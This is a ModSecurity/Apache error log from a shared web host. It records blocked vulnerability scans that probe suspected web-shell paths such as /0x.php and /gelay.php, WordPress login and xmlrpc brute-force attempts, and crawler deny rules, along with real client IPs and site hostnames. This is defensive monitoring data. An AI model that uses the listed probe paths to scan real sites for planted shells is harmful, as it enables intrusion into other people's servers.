[Tue May 26 17:29:31.715139 2026] [security2:error] [pid 891273:tid 891463] [client 203.194.101.7:64576] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLI8DEzZ8z3jtDm82Y0gAAADw"]
[Tue May 26 17:29:32.108085 2026] [security2:error] [pid 891273:tid 891436] [client 113.189.20.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLI8DEzZ8z3jtDm82YywAAACE"]
[Tue May 26 17:29:32.431851 2026] [autoindex:error] [pid 891273:tid 891490] [client 23.27.145.92:10164] AH01276: Cannot serve directory /home2/debatqhn/homegategardensandsuites.com.ng/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:29:32.546949 2026] [security2:error] [pid 891273:tid 891457] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLJMDEzZ8z3jtDm82Y5QAAADY"]
[Tue May 26 17:29:33.170465 2026] [security2:error] [pid 891273:tid 891423] [client 172.202.92.73:29557] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/0x.php"] [unique_id "ahWLJcDEzZ8z3jtDm82ZLAAAABQ"]
[Tue May 26 17:29:33.170556 2026] [security2:error] [pid 891273:tid 891423] [client 172.202.92.73:29557] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/0x.php"] [unique_id "ahWLJcDEzZ8z3jtDm82ZLAAAABQ"]
[Tue May 26 17:29:33.198602 2026] [security2:error] [pid 891273:tid 891448] [client 223.235.98.214:4364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLJcDEzZ8z3jtDm82ZLQAAAC0"]
[Tue May 26 17:29:33.199309 2026] [security2:error] [pid 891273:tid 891448] [client 223.235.98.214:4364] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLJcDEzZ8z3jtDm82ZLQAAAC0"]
[Tue May 26 17:29:34.276212 2026] [security2:error] [pid 891273:tid 891448] [client 114.119.133.194:63855] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWLJsDEzZ8z3jtDm82ZaAAAAC0"], referer: http://haddingtonwines.com/cart?remove_item=086af6e4641abb18caafc151b9aa95c8
[Tue May 26 17:29:34.527005 2026] [security2:error] [pid 891273:tid 891478] [client 172.202.92.73:5298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/k.php"] [unique_id "ahWLJsDEzZ8z3jtDm82ZdQAAAEs"]
[Tue May 26 17:29:34.527118 2026] [security2:error] [pid 891273:tid 891478] [client 172.202.92.73:5298] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/k.php"] [unique_id "ahWLJsDEzZ8z3jtDm82ZdQAAAEs"]
[Tue May 26 17:29:35.524074 2026] [security2:error] [pid 891273:tid 891408] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLJ8DEzZ8z3jtDm82ZmQAAAAU"]
[Tue May 26 17:29:37.190515 2026] [security2:error] [pid 891273:tid 891447] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLKMDEzZ8z3jtDm82Z8AAAACw"]
[Tue May 26 17:29:38.269113 2026] [security2:error] [pid 891273:tid 891469] [client 172.202.92.73:5293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/o.php"] [unique_id "ahWLKsDEzZ8z3jtDm82aPAAAAEI"]
[Tue May 26 17:29:38.269197 2026] [security2:error] [pid 891273:tid 891469] [client 172.202.92.73:5293] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/o.php"] [unique_id "ahWLKsDEzZ8z3jtDm82aPAAAAEI"]
[Tue May 26 17:29:39.415810 2026] [security2:error] [pid 891273:tid 891494] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLKsDEzZ8z3jtDm82abQAAAFs"]
[Tue May 26 17:29:41.124170 2026] [security2:error] [pid 891273:tid 891530] [client 207.246.106.216:50002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.106.246.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWLLMDEzZ8z3jtDm82a-gAAAH8"]
[Tue May 26 17:29:41.940406 2026] [security2:error] [pid 891273:tid 891419] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLLcDEzZ8z3jtDm82bUgAAABA"]
[Tue May 26 17:29:42.023466 2026] [security2:error] [pid 891273:tid 891518] [client 203.194.101.7:64933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLLcDEzZ8z3jtDm82bcAAAAHM"]
[Tue May 26 17:29:42.023598 2026] [security2:error] [pid 891273:tid 891518] [client 203.194.101.7:64933] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLLcDEzZ8z3jtDm82bcAAAAHM"]
[Tue May 26 17:29:42.156673 2026] [http2:info] [pid 894579:tid 894579] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 17:29:42.455020 2026] [security2:error] [pid 891273:tid 891351] [remote 49.0.67.127:63794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.67.0.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLLsDEzZ8z3jtDm82biAAAYE0"]
[Tue May 26 17:29:42.863461 2026] [security2:error] [pid 891273:tid 891417] [client 207.246.106.216:60448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.106.246.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWLLsDEzZ8z3jtDm82bvAAAAA4"]
[Tue May 26 17:29:42.928429 2026] [security2:error] [pid 894579:tid 894730] [client 172.202.92.73:5252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/bb.php"] [unique_id "ahWLLgEtZWuWWBGzl__B4wAAAR4"]
[Tue May 26 17:29:42.928538 2026] [security2:error] [pid 894579:tid 894730] [client 172.202.92.73:5252] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/bb.php"] [unique_id "ahWLLgEtZWuWWBGzl__B4wAAAR4"]
[Tue May 26 17:29:44.207018 2026] [security2:error] [pid 894579:tid 894744] [client 223.235.98.214:19565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLMAEtZWuWWBGzl__CEAAAASw"]
[Tue May 26 17:29:44.207179 2026] [security2:error] [pid 894579:tid 894744] [client 223.235.98.214:19565] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLMAEtZWuWWBGzl__CEAAAASw"]
[Tue May 26 17:29:44.880045 2026] [security2:error] [pid 894579:tid 894820] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLMAEtZWuWWBGzl__CHQAAAXc"]
[Tue May 26 17:29:45.593636 2026] [security2:error] [pid 894579:tid 894699] [remote 5.78.119.122:46196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLMQEtZWuWWBGzl__CZQABaXc"]
[Tue May 26 17:29:45.929479 2026] [security2:error] [pid 891273:tid 891471] [client 172.202.92.73:29532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/rip.php"] [unique_id "ahWLMcDEzZ8z3jtDm82cOwAAAEQ"]
[Tue May 26 17:29:45.929597 2026] [security2:error] [pid 891273:tid 891471] [client 172.202.92.73:29532] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/rip.php"] [unique_id "ahWLMcDEzZ8z3jtDm82cOwAAAEQ"]
[Tue May 26 17:29:47.235128 2026] [security2:error] [pid 891273:tid 891452] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLMsDEzZ8z3jtDm82cVAAAADE"]
[Tue May 26 17:29:47.872566 2026] [security2:error] [pid 894579:tid 894684] [remote 178.156.182.155:40776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWLMwEtZWuWWBGzl__CpgABDGg"]
[Tue May 26 17:29:48.087954 2026] [security2:error] [pid 891273:tid 891426] [client 172.98.32.47:25583] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWLM8DEzZ8z3jtDm82cbAAAABc"]
[Tue May 26 17:29:48.248898 2026] [security2:error] [pid 891273:tid 891495] [client 172.202.92.73:29550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/s.php"] [unique_id "ahWLNMDEzZ8z3jtDm82ccQAAAFw"]
[Tue May 26 17:29:48.248999 2026] [security2:error] [pid 891273:tid 891495] [client 172.202.92.73:29550] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/s.php"] [unique_id "ahWLNMDEzZ8z3jtDm82ccQAAAFw"]
[Tue May 26 17:29:49.555104 2026] [security2:error] [pid 891273:tid 891277] [remote 65.2.90.30:42872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWLNcDEzZ8z3jtDm82ciQAAcQM"]
[Tue May 26 17:29:49.596440 2026] [security2:error] [pid 894579:tid 894733] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLNQEtZWuWWBGzl__CtQAAASE"]
[Tue May 26 17:29:49.617343 2026] [security2:error] [pid 891273:tid 891414] [client 172.202.92.73:30196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/wp-content/admin.php"] [unique_id "ahWLNcDEzZ8z3jtDm82cjQAAAAs"]
[Tue May 26 17:29:49.617444 2026] [security2:error] [pid 891273:tid 891414] [client 172.202.92.73:30196] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/wp-content/admin.php"] [unique_id "ahWLNcDEzZ8z3jtDm82cjQAAAAs"]
[Tue May 26 17:29:51.674425 2026] [security2:error] [pid 891273:tid 891482] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLN8DEzZ8z3jtDm82cngAAAE8"]
[Tue May 26 17:29:52.100822 2026] [security2:error] [pid 894579:tid 894811] [client 203.194.101.7:65343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLOAEtZWuWWBGzl__C6AAAAW4"]
[Tue May 26 17:29:52.100967 2026] [security2:error] [pid 894579:tid 894811] [client 203.194.101.7:65343] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLOAEtZWuWWBGzl__C6AAAAW4"]
[Tue May 26 17:29:52.102375 2026] [security2:error] [pid 891273:tid 891472] [client 172.202.92.73:29521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/gelay.php"] [unique_id "ahWLOMDEzZ8z3jtDm82cpwAAAEU"]
[Tue May 26 17:29:52.102444 2026] [security2:error] [pid 891273:tid 891472] [client 172.202.92.73:29521] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/gelay.php"] [unique_id "ahWLOMDEzZ8z3jtDm82cpwAAAEU"]
[Tue May 26 17:29:53.655464 2026] [security2:error] [pid 894579:tid 894816] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLOQEtZWuWWBGzl__C-QAAAXM"]
[Tue May 26 17:29:55.004567 2026] [security2:error] [pid 891273:tid 891506] [client 223.235.98.214:6942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLO8DEzZ8z3jtDm82cxgAAAGc"]
[Tue May 26 17:29:55.006079 2026] [security2:error] [pid 891273:tid 891506] [client 223.235.98.214:6942] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLO8DEzZ8z3jtDm82cxgAAAGc"]
[Tue May 26 17:29:56.643874 2026] [security2:error] [pid 891273:tid 891431] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLPMDEzZ8z3jtDm82c3gAAABw"]
[Tue May 26 17:29:58.993663 2026] [security2:error] [pid 891273:tid 891412] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLPsDEzZ8z3jtDm82dDAAAAAk"]
[Tue May 26 17:30:00.152305 2026] [security2:error] [pid 894579:tid 894734] [client 123.21.250.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLPwEtZWuWWBGzl__DZQAAASI"]
[Tue May 26 17:30:01.004213 2026] [security2:error] [pid 894579:tid 894818] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLQAEtZWuWWBGzl__DdAAAAXU"]
[Tue May 26 17:30:01.225564 2026] [security2:error] [pid 891273:tid 891511] [client 172.202.92.73:37401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/wp-admin/images/admin.php"] [unique_id "ahWLQcDEzZ8z3jtDm82dIwAAAGw"]
[Tue May 26 17:30:01.225676 2026] [security2:error] [pid 891273:tid 891511] [client 172.202.92.73:37401] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/wp-admin/images/admin.php"] [unique_id "ahWLQcDEzZ8z3jtDm82dIwAAAGw"]
[Tue May 26 17:30:02.475663 2026] [security2:error] [pid 894579:tid 894802] [client 203.194.101.7:49287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLQgEtZWuWWBGzl__DlgAAAWU"]
[Tue May 26 17:30:02.475809 2026] [security2:error] [pid 894579:tid 894802] [client 203.194.101.7:49287] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLQgEtZWuWWBGzl__DlgAAAWU"]
[Tue May 26 17:30:02.947408 2026] [security2:error] [pid 894579:tid 894753] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLQgEtZWuWWBGzl__DmQAAATU"]
[Tue May 26 17:30:05.023392 2026] [security2:error] [pid 891273:tid 891326] [remote 173.212.245.56:59320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWLRMDEzZ8z3jtDm82dSAAAJzQ"]
[Tue May 26 17:30:05.696214 2026] [security2:error] [pid 891273:tid 891316] [remote 94.76.235.103:50686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLRcDEzZ8z3jtDm82dUAAARCo"]
[Tue May 26 17:30:05.833514 2026] [security2:error] [pid 894579:tid 894749] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLRQEtZWuWWBGzl__DzQAAATE"]
[Tue May 26 17:30:06.504491 2026] [security2:error] [pid 891273:tid 891488] [client 223.235.98.214:15118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLRsDEzZ8z3jtDm82dXAAAAFU"]
[Tue May 26 17:30:06.504743 2026] [security2:error] [pid 891273:tid 891488] [client 223.235.98.214:15118] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLRsDEzZ8z3jtDm82dXAAAAFU"]
[Tue May 26 17:30:06.925825 2026] [security2:error] [pid 894579:tid 894788] [client 107.175.151.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLRgEtZWuWWBGzl__D4AAAAVc"], referer: https://www.anujtradingco.com/
[Tue May 26 17:30:07.243473 2026] [security2:error] [pid 891273:tid 891328] [remote 147.93.168.136:41016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.168.93.147.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWLR8DEzZ8z3jtDm82dZgAAWDY"]
[Tue May 26 17:30:08.302463 2026] [security2:error] [pid 891273:tid 891444] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLR8DEzZ8z3jtDm82dagAAACk"]
